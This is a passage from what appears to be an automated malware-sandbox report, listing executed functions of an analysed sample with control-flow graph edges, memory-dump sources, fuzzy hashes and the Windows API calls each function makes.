40791->40789 40794 f7f6e0 40792->40794 40793 f7f71d 40793->40783 40794->40793 40795 51c0db8 CreateWindowExW 40794->40795 40796 51c0dc8 CreateWindowExW 40794->40796 40795->40793 40796->40793

                              Executed Functions

                              Function 0637ACE8 Relevance: 2.9, Strings: 2, Instructions: 364COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 637ace8-637ad1a 1 637ad21-637aded 0->1 2 637ad1c 0->2 7 637ae02 1->7 8 637adef-637adfd 1->8 2->1 71 637ae08 call 637b69e 7->71 72 637ae08 call 637b72e 7->72 73 637ae08 call 637b5ec 7->73 74 637ae08 call 637b5a9 7->74 9 637b2b0-637b2bd 8->9 10 637ae0e-637aebe 18 637b23f-637b269 10->18 20 637aec3-637b0d9 18->20 21 637b26f-637b2ae 18->21 48 637b0e5-637b12f 20->48 21->9 51 637b137-637b139 48->51 52 637b131 48->52 55 637b140-637b147 51->55 53 637b133-637b135 52->53 54 637b13b 52->54 53->51 53->54 54->55 56 637b1c1-637b1e7 55->56 57 637b149-637b1c0 55->57 59 637b1f4-637b200 56->59 60 637b1e9-637b1f2 56->60 57->56 62 637b206-637b225 59->62 60->62 67 637b227-637b23a 62->67 68 637b23b-637b23c 62->68 67->68 68->18 71->10 72->10 73->10 74->10
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID: .$1
                              • API String ID: 0-1839485796
                              • Opcode ID: 2bfd70dc7de4b30ae81a695595599ff0403ad702d2aa42a7076055e492278fb7
                              • Instruction ID: ba0cbb3d050a9b0ce66aa5afec001475506a05213da5b6b7b19bc0168563ccb3
                              • Opcode Fuzzy Hash: 2bfd70dc7de4b30ae81a695595599ff0403ad702d2aa42a7076055e492278fb7
                              • Instruction Fuzzy Hash: 02F1D174E02228CFDB68DF65C894B9DBBB2FF89301F1081A9D50AA7290DB355E85CF50
                              Function 0637DAD8 Relevance: 2.1, Strings: 1, Instructions: 830COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID: 2
                              • API String ID: 0-450215437
                              • Opcode ID: 67c37816e367b579af008310e71b320ae1cf1a76e51e1e9b24e53c1bfb765a83
                              • Instruction ID: 6bd071b6ab2085e9e8d62f96d0102211a6013cc3a85e3604ac66b9605e7536c2
                              • Opcode Fuzzy Hash: 67c37816e367b579af008310e71b320ae1cf1a76e51e1e9b24e53c1bfb765a83
                              • Instruction Fuzzy Hash: F6827C75A10256CFEBA4DF68D848BA977F1BF58314F1180A8D8099B761EF389D88CF50
                              Function 06379548 Relevance: 1.1, Instructions: 1096COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 549 6379548-6379583 551 6379585 549->551 552 637958a-6379626 549->552 551->552 555 6379678-63796b3 552->555 556 6379628-6379672 552->556 561 637aa01-637aa1a 555->561 556->555 564 637aa20-637aa46 561->564 565 63796b8-6379847 561->565 567 637aa55 564->567 568 637aa48-637aa54 564->568 583 637a9b9-637a9d3 565->583 572 637aa56 567->572 568->567 572->572 585 637984c-6379990 583->585 586 637a9d9-637a9fd 583->586 602 63799c3-6379a0a 585->602 603 6379992-63799be 585->603 586->561 609 6379a2f-6379a3e 602->609 610 6379a0c-6379a2d 602->610 606 6379a51-6379c08 603->606 631 6379c5a-6379cd5 606->631 632 6379c0a-6379c54 606->632 615 6379a44-6379a50 609->615 610->615 615->606 639 6379d27-6379da1 631->639 640 6379cd7-6379d21 631->640 632->631 647 6379df3-6379e43 639->647 648 6379da3-6379ded 639->648 640->639 653 637a2bc-637a343 647->653 654 6379e49-6379eac 647->654 648->647 666 637a345-637a39b 653->666 667 637a3a1-637a3ac 653->667 662 6379eb3-637a032 call 6379364 call 6377a70 call 6378f68 call 6376584 call 6376594 654->662 663 6379eae 654->663 709 637a29f-637a2bb 662->709 710 637a038-637a08a 662->710 663->662 666->667 792 637a3b2 call 637ab70 667->792 793 637a3b2 call 637ab60 667->793 670 637a3b8-637a445 683 637a447-637a49d 670->683 684 637a4a3-637a4ae 670->684 683->684 796 637a4b4 call 637ab70 684->796 797 637a4b4 call 637ab60 684->797 686 637a4ba-637a532 698 637a534-637a58a 686->698 699 637a590-637a59b 686->699 698->699 794 637a5a1 call 637ab70 699->794 795 637a5a1 call 637ab60 699->795 702 637a5a7-637a5b9 706 637a5c1-637a613 702->706 716 637a665-637a670 706->716 717 637a615-637a65f 706->717 709->653 720 637a0dc-637a157 710->720 721 637a08c-637a0d6 710->721 790 637a676 call 637ab70 716->790 791 637a676 call 637ab60 716->791 717->716 719 637a67c-637a6c1 731 637a7f7-637a9a0 719->731 732 637a6c7-637a7f6 719->732 735 637a1a9-637a223 720->735 736 637a159-637a1a3 720->736 721->720 787 637a9a2-637a9b7 731->787 788 637a9b8 731->788 732->731 751 637a275-637a29e 735->751 752 637a225-637a26f 735->752 736->735 751->709 752->751 787->788 788->583 790->719 791->719 792->670 793->670 794->702 795->702 796->686 797->686
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b84e25794139fdad2a484dfde6299572fdc2bd9029ab6610d082c7b2c01d5402
                              • Instruction ID: bb5cd88000a07b4f81eef5b7f51b40fefdb3f8fec74e9f6a025959132d4caf4b
                              • Opcode Fuzzy Hash: b84e25794139fdad2a484dfde6299572fdc2bd9029ab6610d082c7b2c01d5402
                              • Instruction Fuzzy Hash: 9CC28074A02229CFDBA4EF24D998B9DBBB2BF49301F1081E9D409A7354DB355E85CF90
                              Function 051C6948 Relevance: .5, Instructions: 499COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2588015425.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_51c0000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 23fea02f2f5dc6336fb9d1229ce28bf1b328c682456bc2d43d1dbf9a00c4e5a5
                              • Instruction ID: 58d7f2f77645c7c979723d880ed9a1e8f7c28fb203c0a5723a25203cdc5f7656
                              • Opcode Fuzzy Hash: 23fea02f2f5dc6336fb9d1229ce28bf1b328c682456bc2d43d1dbf9a00c4e5a5
                              • Instruction Fuzzy Hash: 1422F075901228CFDB65DF64C944BE9BBB2FF49301F4081E9E509AB2A1DB369AC4DF40
                              Function 0637CD78 Relevance: .4, Instructions: 430COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6fad975a2ec7be2f44ef64af816fef0c51d3e2766bea3085bb7026ad5bcec135
                              • Instruction ID: f9539d3c5d4a8759d5c3e457c9f5ddfc28bc77d3bf65d1b285c5002d285659bc
                              • Opcode Fuzzy Hash: 6fad975a2ec7be2f44ef64af816fef0c51d3e2766bea3085bb7026ad5bcec135
                              • Instruction Fuzzy Hash: F9029071E0025ACFCB65DF74C4502ADFBF2BF85300F24866AD446AB241EB399A85CBD1
                              Function 051C8D18 Relevance: .3, Instructions: 294COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2588015425.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_51c0000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3807082e34f47869539da25af485497254b8968e061c2d9759e3464133586dd7
                              • Instruction ID: 1bd1e5a80cc4ef226f521c745702a5b4b1c30fdd5f9f0643f809b634434ed7bc
                              • Opcode Fuzzy Hash: 3807082e34f47869539da25af485497254b8968e061c2d9759e3464133586dd7
                              • Instruction Fuzzy Hash: 84D1E638A11218CFCB14EFB4D85569DBBB6FF8A301F5085A9E41AAB354DF31A985CF10
                              Function 051C8D28 Relevance: .3, Instructions: 289COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2588015425.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_51c0000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9bd2df76a5ceb54e93836cac2cc3c33b8b906fb8658f9ee0be496273c6237b1e
                              • Instruction ID: 6966c1b4d575b2af1041dd488d22f0e281e64edc8d8fcce84af9fe2df63c4a6f
                              • Opcode Fuzzy Hash: 9bd2df76a5ceb54e93836cac2cc3c33b8b906fb8658f9ee0be496273c6237b1e
                              • Instruction Fuzzy Hash: 7FD1E638A11218CFCB14EFB4D855A9DBBB6FF8A301F5085A9E41AAB354DF316985CF10
                              Function 00F7AE30 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 359 f7ae30-f7ae3f 360 f7ae41-f7ae4e call f79838 359->360 361 f7ae6b-f7ae6f 359->361 366 f7ae64 360->366 367 f7ae50 360->367 363 f7ae83-f7aec4 361->363 364 f7ae71-f7ae7b 361->364 370 f7aec6-f7aece 363->370 371 f7aed1-f7aedf 363->371 364->363 366->361 417 f7ae56 call f7b0c8 367->417 418 f7ae56 call f7b0b8 367->418 370->371 372 f7af03-f7af05 371->372 373 f7aee1-f7aee6 371->373 378 f7af08-f7af0f 372->378 375 f7aef1 373->375 376 f7aee8-f7aeef call f7a814 373->376 374 f7ae5c-f7ae5e 374->366 377 f7afa0-f7afb7 374->377 380 f7aef3-f7af01 375->380 376->380 390 f7afb9-f7b018 377->390 381 f7af11-f7af19 378->381 382 f7af1c-f7af23 378->382 380->378 381->382 384 f7af25-f7af2d 382->384 385 f7af30-f7af39 call f7a824 382->385 384->385 391 f7af46-f7af4b 385->391 392 f7af3b-f7af43 385->392 410 f7b01a-f7b060 390->410 393 f7af4d-f7af54 391->393 394 f7af69-f7af76 391->394 392->391 393->394 395 f7af56-f7af66 call f7a834 call f7a844 393->395 401 f7af99-f7af9f 394->401 402 f7af78-f7af96 394->402 395->394 402->401 412 f7b062-f7b065 410->412 413 f7b068-f7b093 GetModuleHandleW 410->413 412->413 414 f7b095-f7b09b 413->414 415 f7b09c-f7b0b0 413->415 414->415 417->374 418->374
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000), ref: 00F7B086
                              Memory Dump Source
                              • Source File: 00000000.00000002.2578317783.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_f70000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: cdedebfc332fe4d68b4ce40581e1754f1a7d890a0a11de64a9206e50ac2cbb4f
                              • Instruction ID: c808a50caaea224482acbdc8e6e4dd7124f2b098b6f6749cdf7bd8f2c585faea
                              • Opcode Fuzzy Hash: cdedebfc332fe4d68b4ce40581e1754f1a7d890a0a11de64a9206e50ac2cbb4f
                              • Instruction Fuzzy Hash: E07157B0A00B058FD724DF2AD44579ABBF1FF88310F04892EE48AD7A50D735E845DB92
                              Function 051C1CE4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 434 51c1ce4-51c1d56 437 51c1d58-51c1d5e 434->437 438 51c1d61-51c1d68 434->438 437->438 439 51c1d6a-51c1d70 438->439 440 51c1d73-51c1dab 438->440 439->440 441 51c1db3-51c1e12 CreateWindowExW 440->441 442 51c1e1b-51c1e53 441->442 443 51c1e14-51c1e1a 441->443 447 51c1e55-51c1e58 442->447 448 51c1e60 442->448 443->442 447->448 449 51c1e61 448->449 449->449
                              APIs
                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051C1E02
                              Memory Dump Source
                              • Source File: 00000000.00000002.2588015425.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_51c0000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: CreateWindow
                              • String ID:
                              • API String ID: 716092398-0
                              • Opcode ID: 204d2a9c5b0266dd4654d5d88bb6f23a6aa6c454a3514f1a95095464b538c454
                              • Instruction ID: 6be02d5b64b29c5b8172e5721ab5cbc95adb55fdf043f5168b773d2eb71b22e5
                              • Opcode Fuzzy Hash: 204d2a9c5b0266dd4654d5d88bb6f23a6aa6c454a3514f1a95095464b538c454
                              • Instruction Fuzzy Hash: 2E51DFB1C00349EFDB15CF99D884ADEBFB5BF48310F24822AE819AB211D7759985CF90
                              Function 051C0AA8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 419 51c0aa8-51c1d56 421 51c1d58-51c1d5e 419->421 422 51c1d61-51c1d68 419->422 421->422 423 51c1d6a-51c1d70 422->423 424 51c1d73-51c1e12 CreateWindowExW 422->424 423->424 426 51c1e1b-51c1e53 424->426 427 51c1e14-51c1e1a 424->427 431 51c1e55-51c1e58 426->431 432 51c1e60 426->432 427->426 431->432 433 51c1e61 432->433 433->433
                              APIs
                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051C1E02
                              Memory Dump Source
                              • Source File: 00000000.00000002.2588015425.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_51c0000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: CreateWindow
                              • String ID:
                              • API String ID: 716092398-0
                              • Opcode ID: 483d93dac21d733b43296c1b2fc94055ee1e3ac866cca77cb221ea8d2360e5b0
                              • Instruction ID: 1387aaccad926068e7d1cf88a7cc5050e0c7d4be08637db661a43d9fde23c557
                              • Opcode Fuzzy Hash: 483d93dac21d733b43296c1b2fc94055ee1e3ac866cca77cb221ea8d2360e5b0
                              • Instruction Fuzzy Hash: 3C51DEB1C00349AFDB15CF99C884ADEBFB6BF48300F24816AE819AB211D7719885CF90
                              Function 051C0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 450 51c0bfc-51c42fc 453 51c43ac-51c43cc call 51c0ad4 450->453 454 51c4302-51c4307 450->454 462 51c43cf-51c43dc 453->462 455 51c4309-51c4340 454->455 456 51c435a-51c4392 CallWindowProcW 454->456 463 51c4349-51c4358 455->463 464 51c4342-51c4348 455->464 458 51c439b-51c43aa 456->458 459 51c4394-51c439a 456->459 458->462 459->458 463->462 464->463
                              APIs
                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 051C4381
                              Memory Dump Source
                              • Source File: 00000000.00000002.2588015425.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_51c0000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: CallProcWindow
                              • String ID:
                              • API String ID: 2714655100-0
                              • Opcode ID: 405a424fbc325e9f8407e201fcead9d86e6ef2c2ccff26b3733562befa428baa
                              • Instruction ID: edd4dc43728d2ebfc0f08427b154c38a3af385a8ec079f861b07ad0027755f59
                              • Opcode Fuzzy Hash: 405a424fbc325e9f8407e201fcead9d86e6ef2c2ccff26b3733562befa428baa
                              • Instruction Fuzzy Hash: 014136B4904309CFDB14CF99C498EAABBF6FF88314F25858DD519AB321D375A841CBA0
                              Function 00F74248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 467 f74248-f75a01 CreateActCtxA 470 f75a03-f75a09 467->470 471 f75a0a-f75a64 467->471 470->471 478 f75a66-f75a69 471->478 479 f75a73-f75a77 471->479 478->479 480 f75a79-f75a85 479->480 481 f75a88 479->481 480->481 483 f75a89 481->483 483->483
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 00F759F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2578317783.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_f70000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: a3f899b041f7fd80371f5a3b8fa6db939ce8b2c105874ea1dcc1f5745050756c
                              • Instruction ID: 476f39fab564aabbd808b06be101e1ed99efd350eee7f728d16864b265f5653d
                              • Opcode Fuzzy Hash: a3f899b041f7fd80371f5a3b8fa6db939ce8b2c105874ea1dcc1f5745050756c
                              • Instruction Fuzzy Hash: AD41E070C0071DCBEB24DFA9C884B8DBBB5FF48704F20816AD508AB251DBB56945CF91
                              Function 00F75935 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 484 f75935-f7593c 485 f75944-f75a01 CreateActCtxA 484->485 487 f75a03-f75a09 485->487 488 f75a0a-f75a64 485->488 487->488 495 f75a66-f75a69 488->495 496 f75a73-f75a77 488->496 495->496 497 f75a79-f75a85 496->497 498 f75a88 496->498 497->498 500 f75a89 498->500 500->500
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 00F759F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2578317783.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_f70000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 7f1c05e6e0bb8a34697c428f0ee9f31b6c5926ab0d83aa383360378c8aac2ba1
                              • Instruction ID: bb93f9b41d4c8b1e6ad9068d26685126b423152e468f4c903f2b1d33400b539f
                              • Opcode Fuzzy Hash: 7f1c05e6e0bb8a34697c428f0ee9f31b6c5926ab0d83aa383360378c8aac2ba1
                              • Instruction Fuzzy Hash: 3341D170C0071DCEEB24DFA9C884B8DBBB5BF48704F24816AD508BB251DBB56949CF51
                              Function 00F7A858 Relevance: 1.6, APIs: 1, Instructions: 84libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 501 f7a858-f7a860 503 f7a862-f7b2e8 501->503 504 f7a88c 501->504 510 f7b2f0-f7b31f LoadLibraryExW 503->510 511 f7b2ea-f7b2ed 503->511 506 f7a88e-f7a8c0 504->506 507 f7a8ec-f7a954 504->507 512 f7b321-f7b327 510->512 513 f7b328-f7b345 510->513 511->510 512->513
                              APIs
                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00F7B101,00000800,00000000,00000000), ref: 00F7B312
                              Memory Dump Source
                              • Source File: 00000000.00000002.2578317783.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_f70000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: fdbdce38718dd6421e8a664da60cdc6fbecc2c4db5e82a4556e0320248a0942f
                              • Instruction ID: c6755ba0b14490a500affbccfb7bd6f8826eec93776d33fd4c371cd5908b1e6b
                              • Opcode Fuzzy Hash: fdbdce38718dd6421e8a664da60cdc6fbecc2c4db5e82a4556e0320248a0942f
                              • Instruction Fuzzy Hash: 9731BAB6C04348CFEB01CF9AC884BEEBBF0EB89310F06805AD558A7201D3789545DFA2
                              Function 00F7C9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 516 f7c9a0-f7d394 DuplicateHandle 518 f7d396-f7d39c 516->518 519 f7d39d-f7d3ba 516->519 518->519
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F7D2C6,?,?,?,?,?), ref: 00F7D387
                              Memory Dump Source
                              • Source File: 00000000.00000002.2578317783.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_f70000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 62b04fb995edb46ac613b06ecce01023612400efd9c217d2e8d74093f6c637db
                              • Instruction ID: 12efec1c5c1a9c6993cf85450fe10b5f3cb01a38b0cac8676e6e333e2b9c602c
                              • Opcode Fuzzy Hash: 62b04fb995edb46ac613b06ecce01023612400efd9c217d2e8d74093f6c637db
                              • Instruction Fuzzy Hash: 4D2103B5D00208DFDB10CFAAD984ADEBBF4EB48310F14801AE918A3310D378A954DFA5
                              Function 00F7D2F9 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 522 f7d2f9-f7d394 DuplicateHandle 523 f7d396-f7d39c 522->523 524 f7d39d-f7d3ba 522->524 523->524
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F7D2C6,?,?,?,?,?), ref: 00F7D387
                              Memory Dump Source
                              • Source File: 00000000.00000002.2578317783.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_f70000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 80bea7018ecaaf45132c91697bfe33729d0e9a0f8b49275db77771cf009f3260
                              • Instruction ID: 367d65ce6ad92d11526692203bc2239f5c8d78e0d878fbaabcfe3d1f2ab31964
                              • Opcode Fuzzy Hash: 80bea7018ecaaf45132c91697bfe33729d0e9a0f8b49275db77771cf009f3260
                              • Instruction Fuzzy Hash: 7D21E0B5D00249DFDB10CFAAE984ADEBBF5EB48314F15801AE918A3350D378A954DFA1
                              Function 00F7A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 527 f7a870-f7b2e8 529 f7b2f0-f7b31f LoadLibraryExW 527->529 530 f7b2ea-f7b2ed 527->530 531 f7b321-f7b327 529->531 532 f7b328-f7b345 529->532 530->529 531->532
                              APIs
                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00F7B101,00000800,00000000,00000000), ref: 00F7B312
                              Memory Dump Source
                              • Source File: 00000000.00000002.2578317783.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_f70000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: a36a715eb35fd8b7623f873db6cdf05da6f375be81d4dd23c8922d2b4d129648
                              • Instruction ID: bdb41006d8907a163974af76f8aecea66fb3e4b511d8a404c16ff0c7f2be3149
                              • Opcode Fuzzy Hash: a36a715eb35fd8b7623f873db6cdf05da6f375be81d4dd23c8922d2b4d129648
                              • Instruction Fuzzy Hash: 4B1103B6C003498FDB10DF9AD448B9EBBF4EB48710F10852AD919A7200D375A945CFA5
                              Function 00F7B2A0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 535 f7b2a0-f7b2e8 537 f7b2f0-f7b31f LoadLibraryExW 535->537 538 f7b2ea-f7b2ed 535->538 539 f7b321-f7b327 537->539 540 f7b328-f7b345 537->540 538->537 539->540
                              APIs
                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00F7B101,00000800,00000000,00000000), ref: 00F7B312
                              Memory Dump Source
                              • Source File: 00000000.00000002.2578317783.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_f70000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: fdc6ebc746e48b8e992d220a684fe835c2881066bcdc7f75a385aa4e163a3029
                              • Instruction ID: ecd7ada52f3f03bab413e9865ef7bffcd9ff6745a080863b0964b106b55ea51d
                              • Opcode Fuzzy Hash: fdc6ebc746e48b8e992d220a684fe835c2881066bcdc7f75a385aa4e163a3029
                              • Instruction Fuzzy Hash: 461114B6C003498FDB10CFAAD444BDEFBF4EB48720F14841AE519A7200C375A545CFA1
                              Function 00F7B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 543 f7b020-f7b060 544 f7b062-f7b065 543->544 545 f7b068-f7b093 GetModuleHandleW 543->545 544->545 546 f7b095-f7b09b 545->546 547 f7b09c-f7b0b0 545->547 546->547
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000), ref: 00F7B086
                              Memory Dump Source
                              • Source File: 00000000.00000002.2578317783.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_f70000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 5f319ec96127044b896afa890f607317b42eac860e3f02aefcde229affed5665
                              • Instruction ID: 188e83a8379d15eb159239ad1bea8bc358c47826fe68df7dc06643db8b2eb5d5
                              • Opcode Fuzzy Hash: 5f319ec96127044b896afa890f607317b42eac860e3f02aefcde229affed5665
                              • Instruction Fuzzy Hash: A51102B5C007498FCB20DF9AD448B9EFBF4AB89324F10851AD429B7210D375A545CFA1
                              Function 0637DAC8 Relevance: .8, Instructions: 754COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 046fefaedad19fa5e34ec9d0a3c4f6dfe31cc896cf5fb795c23749e0ce9e5952
                              • Instruction ID: c3a5460cd1cb4005b93f4a41b39ff3cbbb19d3152b1a89d2fb434dce5478dc9f
                              • Opcode Fuzzy Hash: 046fefaedad19fa5e34ec9d0a3c4f6dfe31cc896cf5fb795c23749e0ce9e5952
                              • Instruction Fuzzy Hash: E5726B75A10256CFEBB4DF68D848BA977F1BF54314F1280A8D8098B761EF389888CF51
                              Function 06379FF8 Relevance: .5, Instructions: 522COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d84c1f2e4f591a8132219a88bb223b49eb3d5140a9f6e5812bcd69c7232cb65c
                              • Instruction ID: e1a7082191e28f8845625ad4d5a53ef4d33acead8519610500787d4c91188265
                              • Opcode Fuzzy Hash: d84c1f2e4f591a8132219a88bb223b49eb3d5140a9f6e5812bcd69c7232cb65c
                              • Instruction Fuzzy Hash: 57428374A122298FCB64EF24D898BADBBB5FF49301F5041EAE409A7350DB359E85CF50
                              Function 0637A2A3 Relevance: .4, Instructions: 393COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
